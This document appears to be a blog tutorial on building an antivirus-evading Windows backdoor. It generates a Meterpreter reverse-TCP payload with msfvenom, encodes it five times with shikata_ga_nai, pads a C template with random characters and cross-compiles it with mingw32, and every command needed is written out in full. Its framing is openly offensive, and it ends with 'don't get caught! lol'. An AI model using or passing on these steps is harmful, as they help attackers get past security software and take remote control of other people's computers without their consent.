Using Custom Cross Compiling In Metasploit To Evade Antivirus

Basically what I will show you today is how to use a raw shellcode template written in C, together with msfvenom, to give Meterpreter a slightly different signature. This helps evade AV because the signature won't match anything in the AV's database: even a slight change to a program changes its signature and the way a computer identifies it. So with that, let's begin. First things first, open leafpad, gedit, or whatever text editor you prefer on your Kali Linux machine and type in this C code:

[Screenshot from 2015-02-07 12:11:24: the C template source]

Then save it as custom meterpreter.c or whatever name you prefer. After you have saved the meterpreter.c template we need to fill in the random and shellcode variables with some data; they are both unsigned character arrays. By adding some randomness and compiling our own C code, the hope is that this will be enough to trick most antivirus programs. The random variable introduces some randomness into the template, and the shellcode variable holds the hexadecimal bytes of the payload we create with msfvenom 🙂 The main function runs when our compiled C program starts and executes our shellcode.

OK, so next we create our payload using msfvenom. Open a terminal and type:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=2345 -f c -e x86/shikata_ga_nai -i 5

where LHOST and LPORT are the IP and port on your computer that you want the connect-back to go to. The -f switch tells msfvenom you want to generate the payload in C format instead of the default Ruby; the -e switch tells msfvenom you want to use an encoder, in this case shikata_ga_nai; and with the -i switch we tell msfvenom we want 5 iterations of encoding. Moving on: once you execute this and create the payload you will get something like this "\xbe\x64\x9a\x72\xbf\xdb\xdf\xd9\x74\x24\xf4\x58\x2b\xc9\xb1" (it will be much longer than this). Copy and paste it into meterpreter.c, or whatever name you gave your template file, at the end of the line of code that reads unsigned char shellcode[] = so it looks like this:

[Screenshot from 2015-02-07 12:52:35: the template with the shellcode pasted in]

Next we must add the data for the random variable to help further obfuscate our payload. We will use Kali's /dev/urandom to generate some random numbers and characters to add randomness to our payload.

Go to your terminal and type:

cat /dev/urandom | tr -dc 'A-Za-z0-9' | head -c 512

This filters the random bytes down to the digits 0-9 and lower and upper case letters, pipes them to head, and displays only the first 512 characters in the terminal. Once you have these random characters, copy and paste them to the end of the line that reads unsigned char random[] = in your meterpreter.c file, and then save a copy of the file so that everything is kept in it. The reason I say copy is so that you always have a blank version of the template available to quickly make a new custom meterpreter module any time.

Now to compile our program. We can't use GCC because it will compile our code to run on Linux, so we have to use mingw32. If you don't have mingw32 on your Kali machine you'll have to install it from the apt repo with apt-get install mingw32. Once you're done, run this command in the terminal:

i586-mingw32msvc-gcc -o custommeterpreter.exe custommeterpreter.c

This will compile your code into a payload that will run on a 32-bit Windows machine. This concludes my tutorial on making a custom meterpreter module with C. Have fun and don't get caught! lol
